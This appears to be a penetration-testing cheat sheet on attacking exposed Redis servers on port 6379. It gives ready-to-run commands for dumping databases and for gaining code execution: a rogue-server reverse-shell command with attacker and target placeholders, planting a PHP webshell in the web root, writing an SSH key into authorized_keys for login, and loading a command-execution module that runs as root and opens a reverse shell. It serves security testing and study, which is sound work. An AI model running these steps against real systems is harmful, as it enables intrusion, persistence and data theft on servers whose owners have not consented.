# Port 6379 (REDIS)

### Dumping Database

Inside Redis the **databases are numbered starting from 0**. You can see which ones are in use in the output of the `info` command, in the "Keyspace" section:

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/explotation/imgs/Pasted%20image%2020250904133926.png)

Or you can just get all the **keyspaces** (databases) with:

```
INFO keyspace
```

In that example **databases 0 and 1** are in use. **Database 0 contains 4 keys and database 1 contains 1**. By default Redis uses database 0. To dump database 1, for example, run:

```
SELECT 1 [ ... Indicate the database ... ] 
KEYS * [ ... Get Keys ... ] 
GET <KEY> [ ... Get Key ... ]
```

If you get the error `-WRONGTYPE Operation against a key holding the wrong kind of value` while running `GET <KEY>`, the key holds something other than a string or an integer and needs a type-specific command to display it.

To find out the type of a key, use the `TYPE` command. The example below covers list and hash keys.

```
TYPE <KEY> [ ... Type of the Key ... ] 
LRANGE <KEY> 0 -1 [ ... Get list items ... ] 
HGET <KEY> <FIELD> [ ... Get hash item ... ]
DUMP <KEY> [ ... If the type is an unusual one, you can always do this ... ]
```

**Dump the database with npm** [**redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)

### Redis RCE

#### Interactive Shell

[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) can automatically get an interactive shell or a reverse shell in Redis (<= 5.0.5).

```
./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ATTACKER_IP>
```

#### PHP Webshell

After running the `info` command, you need to know the **path** of the **web site folder**:

```
root@kali:~# redis-cli -h 10.85.0.52 
10.85.0.52:6379> config set dir /usr/share/nginx/html 
OK 
10.85.0.52:6379> config set dbfilename redis.php 
OK 
10.85.0.52:6379> set test "<?php phpinfo(); ?>" 
OK  
10.85.0.52:6379> save 
OK
```

#### SSH

**Generate an SSH public-private key pair on your PC:**

```
ssh-keygen -t rsa
```

Write the public key to a file:

```
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
```

**Import the file into redis:**

```
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
```

**Save the public key to the authorized\_keys file on redis server:**

```
root@kali:~# redis-cli -h 10.85.0.52 
10.85.0.52:6379> config set dir /var/lib/redis/.ssh 
OK 
10.85.0.52:6379> config set dbfilename "authorized_keys" 
OK 
10.85.0.52:6379> save 
OK
```

**Finally, you can ssh to the redis server with the private key:**

```
ssh -i id_rsa redis@10.85.0.52
```

**This technique is automated here:** <https://github.com/Avinash-acid/Redis-Server-Exploit>

#### Load Redis Module

Following the instructions from <https://github.com/n0b0dyCN/RedisModules-ExecuteCommand> you can **compile a redis module to execute arbitrary commands**.

Then you need some way to **upload the compiled** module (for example, FTP).

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/explotation/imgs/Pasted%20image%2020250904132504.png)

**Load the uploaded module** at runtime:

```
MODULE LOAD /path/to/mymodule.so
```

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/explotation/imgs/Pasted%20image%2020250904132452.png)

**List loaded modules** to check it was correctly loaded:

```
MODULE LIST
```

Execute **commands**:

```
127.0.0.1:6379> system.exec "id" 
"uid=0(root) gid=0(root) groups=0(root)" 
127.0.0.1:6379> system.exec "whoami" 
"root" 
127.0.0.1:6379> system.rev 127.0.0.1 9999
```

**Unload the module whenever you want:**

```
MODULE UNLOAD mymodule
```
